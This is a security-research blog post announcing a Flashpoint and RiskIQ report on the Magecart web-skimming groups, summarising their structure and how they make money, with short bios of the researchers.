‘Inside Magecart’ Exposes the Operation Behind the Web’s Biggest E-Commerce Scourge
For three years, the Magecart group—the name given to a collective of at least seven cybercrime outfits—has been a scourge to e-commerce. Using the digital equivalent of physical credit-card skimmers on high-profile websites, the group is alleged to be responsible for the loss of hundreds of thousands of payment card records and the personal data of its victims.
Not until the last few months and after the unraveling of three major breaches, however, has Magecart been elevated to the public’s consciousness.
Today, researchers at Flashpoint and RiskIQ are releasing the most comprehensive look inside the Magecart operation to date. Available for download, “Inside Magecart” examines each of the seven groups believed to make up the Magecart threat, including a thorough investigation into the infrastructure supporting these operations, the technical sophistication of the skimmer malware dropped onto the sites of its victims, and how victims are accessed and compromised.
The list of groups in the report is not definitive, nor is it comprehensive. It’s a deep look at these operations that are currently being tracked; security personnel inside the enterprise should understand that there are likely more groups and operations taking part in Magecart’s web-skimming operations. As with most activities in the criminal underground, once others recognize a measure of success by one outfit, others are likely to join in and bring with them their own set of tools and operations, adding more competition and activity to an already crowded space.
The report melds the seven groups into six after a link was found between two of these outfits in the way they profited by using the same fraudulent reshipping operation. The groups differ in their capabilities and approaches to targeting victims. Some cast a wide net and use automated tools, opting for a high volume of victims. These operations, however, may use different variants of skimming malware to distinguish themselves from one another. Other groups, meanwhile, are much more advanced in the malware they use, the means they deploy to avoid detection, or in their approach toward targeting only high-profile victims.
The report also examines the commercial side of the Magecart operation, focusing on the sale and distribution of stolen cards through underground markets. It also details other means of monetization for Magecart, such as mule-handling, and shipping goods. Finally, readers will learn more about the underground supply chain belonging to Magecart, and how the group offers skimmer kits and compromised ecommerce sites as a service.
This is the deepest, publicly reported look into the Magecart operations and an important exposé into the activities of one of the most dangerous and profitable cybercrime outfits operating on the underground today.
Director of Research
Vitali Kremez is a Director of Research at Flashpoint. He oversees analyst collection efforts and leads a technical team that specializes in researching and investigating complex cyber attacks, network intrusions, data breaches, and hacking incidents. Vitali is a strong believer in responsible disclosure and has helped enterprises and government agencies deliver indictments of many high-profile investigations involving data breaches, network intrusions, ransomware, computer hacking, intellectual property theft, credit card fraud, money laundering, and identity theft. Previously, Vitali enjoyed a rewarding career as a Cybercrime Investigative Analyst for the New York County District Attorney’s Office.
He has earned the majority of certifications available in the information technology, information security, digital forensics, and fraud intelligence fields. A renowned expert, speaker, blogger, and columnist, Vitali has contributed articles to Dark Reading, BusinessReview, and Infosecurity Magazine and is a frequent commentator on cybercrime, hacking incidents, policy, and security.
Threat Researcher – RiskIQ
Jordan Herman is a Threat Researcher at RiskIQ.
Threat Researcher – RiskIQ
Yonathan Klijnsma is a Threat Researcher at RiskIQ.